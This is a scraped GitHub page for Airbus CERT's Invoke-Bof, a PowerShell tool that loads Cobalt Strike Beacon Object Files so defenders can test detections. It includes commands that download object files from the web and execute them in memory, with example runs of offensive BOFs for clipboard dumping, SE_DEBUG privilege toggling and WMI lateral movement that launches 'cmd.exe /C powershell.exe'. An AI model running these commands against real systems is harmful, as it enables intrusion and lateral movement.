airbus-cert/Invoke-Bof airbus-cert/Invoke-Bof

  • Stars
    star
    245
  • Rank 165,304 (Top 4 %)
  • Language
    PowerShell
  • License
    Apache License 2.0
  • Created almost 3 years ago
  • Updated almost 3 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
airbus-cert/Invoke-Bof
github

airbus-cert

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Load any Beacon Object File using Powershell!

Invoke-Bof

Load any Beacon Object File using Powershell!

> $BOFBytes = (Invoke-WebRequest -Uri "https://github.com/airbus-cert/Invoke-Bof/raw/main/test/test_invoke_bof.x64.o").Content
> Invoke-Bof -BOFBytes $BOFBytes -EntryPoint go -ArgumentList "toto",14

██╗███╗   ██╗██╗   ██╗ ██████╗ ██╗  ██╗███████╗    ██████╗  ██████╗ ███████╗
██║████╗  ██║██║   ██║██╔═══██╗██║ ██╔╝██╔════╝    ██╔══██╗██╔═══██╗██╔════╝
██║██╔██╗ ██║██║   ██║██║   ██║█████╔╝ █████╗█████╗██████╔╝██║   ██║█████╗  
██║██║╚██╗██║╚██╗ ██╔╝██║   ██║██╔═██╗ ██╔══╝╚════╝██╔══██╗██║   ██║██╔══╝  
██║██║ ╚████║ ╚████╔╝ ╚██████╔╝██║  ██╗███████╗    ██████╔╝╚██████╔╝██║     
╚═╝╚═╝  ╚═══╝  ╚═══╝   ╚═════╝ ╚═╝  ╚═╝╚══════╝    ╚═════╝  ╚═════╝ ╚═╝     
                                               
  [v0.1 Made with love by Airbus CERT https://github.com/airbus-cert]

[+] Mapping of .text    at  0x19924310000
[+] Mapping of .rdata   at  0x19924320000
[+] Mapping of .xdata   at  0x19924330000
[+] Mapping of .pdata   at  0x19924540000
[+] Mapping of /4       at  0x19924550000
[+] Jump into beacon at 0x19924310000
****************************************************************************
Test Beacon for Invoke-Bof
Argument 1 : toto
Argument 2 : 14

=============================== Beacon Output ==============================
00000000   66 6F 6F 00 6F 00 00 00 62 61 72 20 32 32 32 33  foo.o...bar 2223
00000010   33 33                                            33              
============================================================================
[+] Clipboard updated !
[!] Active Windows : Windows PowerShell ISE
[!] Content : $BOFBytes = [IO.File]::ReadAllBytes($Path)
****************************************************************************

CobaltStrike appears to be the favoured offensive framework, used by a large majority of the offensive side of cybersecurity.

The framework is very extensible and allows Red Teamers to develop specific offensive modules named BOF, short for Beacon Object File. Beacons are what CobaltStrike calls their agents, or final payloads.

A Beacon Object File is split into two parts:

  • A payload that will be executed on the victim machine
  • An aggressor script, which will prepare and interact with the payload

Many Red Teams publish BOFs on their public GitHub repositories, implementing lateral movement, vulnerability, attack, or persistence. Instead of reimplementing these techniques each time we want to try and detect them, We decided to find a way to execute them directly.

Get-Help Invoke-Bof

Parameter help
BOFBytes A byte array containing the beacon object file to load and execute. Loading a BOF from a local file :
$BOFBytes = [IO.File]::ReadAllBytes("c:\my_bof.o")
A BOF hosted on a repository :
$BOFBytes = (Invoke-WebRequest -Uri "https://github.com/airbus-cert/Invoke-Bof/raw/main/test/test_invoke_bof.x64.o").Content
EntryPoint Name of the function to call (the convention is to name the entry point go)
ArgumentList List of all arguments that will be passed to the main function. For example marshall two arguments, the first as string, the second as integer :
Invoke-Bof -BOFBytes $BOFBytes -EntryPoint go -ArgumentList "toto",14
To know the parameters accepted by a BOF, please take a look at the aggressor script.
UnicodeStringParameter Marshal all string parameters as UTF-16LE strings

Example :

$BOFBytes = (Invoke-WebRequest -Uri "https://github.com/airbus-cert/Invoke-Bof/raw/main/test/test_invoke_bof.x64.o").Content
Invoke-Bof -BOFBytes $BOFBytes -EntryPoint go -ArgumentList "toto",14

How does it works?

✈️ If you want to know what is behind the scene, please read the dedicated blog post !!! ✈️

Launch Every Beacon Carefully!

Now we can launch every beacon available from Github. For example, we can test a beacon that dumps our clipboard:

> $BOFBytes = (Invoke-WebRequest -Uri "https://github.com/DallasFR/BOF_dumpclip/raw/main/dump.o").Content
> Invoke-Bof -BOFBytes $BOFBytes -EntryPoint go



██╗███╗   ██╗██╗   ██╗ ██████╗ ██╗  ██╗███████╗    ██████╗  ██████╗ ███████╗
██║████╗  ██║██║   ██║██╔═══██╗██║ ██╔╝██╔════╝    ██╔══██╗██╔═══██╗██╔════╝
██║██╔██╗ ██║██║   ██║██║   ██║█████╔╝ █████╗█████╗██████╔╝██║   ██║█████╗  
██║██║╚██╗██║╚██╗ ██╔╝██║   ██║██╔═██╗ ██╔══╝╚════╝██╔══██╗██║   ██║██╔══╝  
██║██║ ╚████║ ╚████╔╝ ╚██████╔╝██║  ██╗███████╗    ██████╔╝╚██████╔╝██║     
╚═╝╚═╝  ╚═══╝  ╚═══╝   ╚═════╝ ╚═╝  ╚═╝╚══════╝    ╚═════╝  ╚═════╝ ╚═╝     
                                               
  [v0.1 Made with love by Airbus CERT https://github.com/airbus-cert]



[+] Mapping of .text    at  0x133e0c20000
[+] Mapping of .rdata   at  0x133e0c30000
[+] Mapping of .xdata   at  0x133e0c40000
[+] Mapping of .pdata   at  0x133e0c50000
[+] Mapping of /4       at  0x133e0c60000
[+] Jump into beacon at 0x133e0c20000
****************************************************************************
[+] Clipboard updated !
[!]Active Windows : Windows PowerShell ISE
[!] Content : $BOFBytes = (Invoke-WebRequest -Uri "https://github.com/DallasFR/BOF_dumpclip/raw/main/dump.o").Content
Invoke-Bof -BOFBytes $BOFBytes  -EntryPoint go
----------------------------------

****************************************************************************

We can try to detect an attacker that tries to enable SE_DEBUG privilege:

> $BOFBytes = (Invoke-WebRequest -Uri "https://github.com/EspressoCake/Toggle_Token_Privileges_BOF/raw/main/dist/toggle_privileges_bof.x64.o").Content
> Invoke-Bof -BOFBytes $BOFBytes -EntryPoint enable -ArgumentList 20



██╗███╗   ██╗██╗   ██╗ ██████╗ ██╗  ██╗███████╗    ██████╗  ██████╗ ███████╗
██║████╗  ██║██║   ██║██╔═══██╗██║ ██╔╝██╔════╝    ██╔══██╗██╔═══██╗██╔════╝
██║██╔██╗ ██║██║   ██║██║   ██║█████╔╝ █████╗█████╗██████╔╝██║   ██║█████╗  
██║██║╚██╗██║╚██╗ ██╔╝██║   ██║██╔═██╗ ██╔══╝╚════╝██╔══██╗██║   ██║██╔══╝  
██║██║ ╚████║ ╚████╔╝ ╚██████╔╝██║  ██╗███████╗    ██████╔╝╚██████╔╝██║     
╚═╝╚═╝  ╚═══╝  ╚═══╝   ╚═════╝ ╚═╝  ╚═╝╚══════╝    ╚═════╝  ╚═════╝ ╚═╝     
                                               
  [v0.1 Made with love by Airbus CERT https://github.com/airbus-cert]



[+] Mapping of .text    at  0x133e0ab0000
[+] Mapping of .data    at  0x133e0bf0000
[+] Mapping of .xdata   at  0x133e0c20000
[+] Mapping of .pdata   at  0x133e0c30000
[+] Mapping of .rdata   at  0x133e0c40000
[+] Mapping of /4       at  0x133e0c50000
[+] Jump into beacon at 0x133e0ab0c10
****************************************************************************
Authors:
	@the_bit_diddler
	@hackersoup

You are not currently in an administrative session. Come again later!

****************************************************************************

You want to execute a process using WMI create process:

> $BOFBytes = (Invoke-WebRequest -Uri "https://github.com/Yaxser/CobaltStrike-BOF/raw/master/WMI%20Lateral%20Movement/ProcCreate.x64.o").Content
> Invoke-Bof -BOFBytes $BOFBytes -EntryPoint go -ArgumentList "\\COMPUTER\ROOT\CIMV2","domain","username","username","cmd.exe /C powershell.exe",1 -UnicodeStringParameter


██╗███╗   ██╗██╗   ██╗ ██████╗ ██╗  ██╗███████╗    ██████╗  ██████╗ ███████╗
██║████╗  ██║██║   ██║██╔═══██╗██║ ██╔╝██╔════╝    ██╔══██╗██╔═══██╗██╔════╝
██║██╔██╗ ██║██║   ██║██║   ██║█████╔╝ █████╗█████╗██████╔╝██║   ██║█████╗
██║██║╚██╗██║╚██╗ ██╔╝██║   ██║██╔═██╗ ██╔══╝╚════╝██╔══██╗██║   ██║██╔══╝
██║██║ ╚████║ ╚████╔╝ ╚██████╔╝██║  ██╗███████╗    ██████╔╝╚██████╔╝██║
╚═╝╚═╝  ╚═══╝  ╚═══╝   ╚═════╝ ╚═╝  ╚═╝╚══════╝    ╚═════╝  ╚═════╝ ╚═╝

  [v0.1 Made with love by Airbus CERT https://github.com/airbus-cert]



[+] Mapping of .text at  0x2e940940000
[+] Mapping of /4 at  0x2e95a880000
[+] Mapping of /30 at  0x2e95a890000
[+] Mapping of /57 at  0x2e95a8f0000
[+] Mapping of /84 at  0x2e95a900000
[+] Mapping of /110 at  0x2e95b160000
[+] Mapping of /137 at  0x2e95b170000
[+] Mapping of /164 at  0x2e95b180000
[+] Mapping of /193 at  0x2e95b190000
[+] Mapping of /223 at  0x2e95b1a0000
[+] Mapping of .xdata at  0x2e95b1b0000
[+] Mapping of .pdata at  0x2e95b1c0000
[+] Mapping of .rdata at  0x2e95b1d0000
[+] Mapping of /253 at  0x2e95b1e0000
[+] Mapping of /277 at  0x2e95b1f0000
[+] Mapping of /301 at  0x2e95b200000
[+] Mapping of /325 at  0x2e95b230000
[!] Unable to parse API name :  _ZTV10_com_error  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZN10_com_error4DtorEv  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZN10_com_errorD1Ev  /!\ continue without resolving /!\
[!] Unable to parse API name :  __imp_LocalFree  /!\ continue without resolving /!\
[!] Unable to parse API name :  _Unwind_Resume  /!\ continue without resolving /!\
[!] Unable to parse API name :  __cxa_call_unexpected  /!\ continue without resolving /!\
[!] Unable to parse API name :  __gxx_personality_seh0  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZTI10_com_error  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZN10_com_errorD1Ev  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZN10_com_errorD0Ev  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZTVN10__cxxabiv117__class_type_infoE  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZTS10_com_error  /!\ continue without resolving /!\
[+] Jump into beacon at 0x2e940940181
****************************************************************************
ExecMethod Succeeded!
****************************************************************************

More Repositories

1

ttddbg

Time Travel Debugging IDA plugin
C++
551
star
2

Winshark

A wireshark plugin to instrument ETW
Lua
527
star
3

Yagi

Yet Another Ghidra Integration for IDA
C++
480
star
4

comida

An IDA Plugin that help analyzing module that use COM
Python
198
star
5

regrippy

A modern Python-3-based alternative to RegRipper
Python
184
star
6

etl-parser

Event Trace Log file parser in pure Python
Python
132
star
7

yara-ttd

Use YARA rules on Time Travel Debugging traces
C
86
star
8

vbSparkle

VBScript & VBA source-to-source deobfuscator with partial-evaluation
C#
72
star
9

ntTraceControl

Powershell Event Tracing Toolbox
PowerShell
72
star
10

CVE-2024-4040

Scanner for CVE-2024-4040
Python
50
star
11

etwbreaker

An IDA plugin to deal with Event Tracing for Windows (ETW)
Python
49
star
12

minusone

Powershell Linter
Rust
46
star
13

PSTrace

Trace ScriptBlock execution for powershell v2
C
39
star
14

tree-sitter-powershell

Powershell grammar for tree-sitter
JavaScript
36
star
15

dnYara

A multi-platform .Net wrapper library for the native Yara library.
C#
35
star
16

timeliner

A rewrite of mactime, a bodyfile reader
Go
34
star
17

Splunk-ETW

A Splunk Technology Add-on to forward filtered ETW events.
C#
30
star
18

cacdec

The hidden mstsc recorder player
Python
28
star
19

ttd2mdmp

Extract data of TTD trace file to a minidump
C++
28
star
20

dirtypipe-ebpf_detection

An eBPF detection program for CVE-2022-0847
C
27
star
21

mispy

Another MISP module for Python
Python
17
star
22

mispgo

Golang library for MISP
Go
5
star
23

usnrs

USN Journal parsing software and library
Rust
5
star
24

bodyfile

A bodyfile parsing library
Go
3
star
25

nix-forensics

Reproducible forensics environment, 100% of the time
Nix
3
star
26

skyblue.team

Our website
HTML
1
star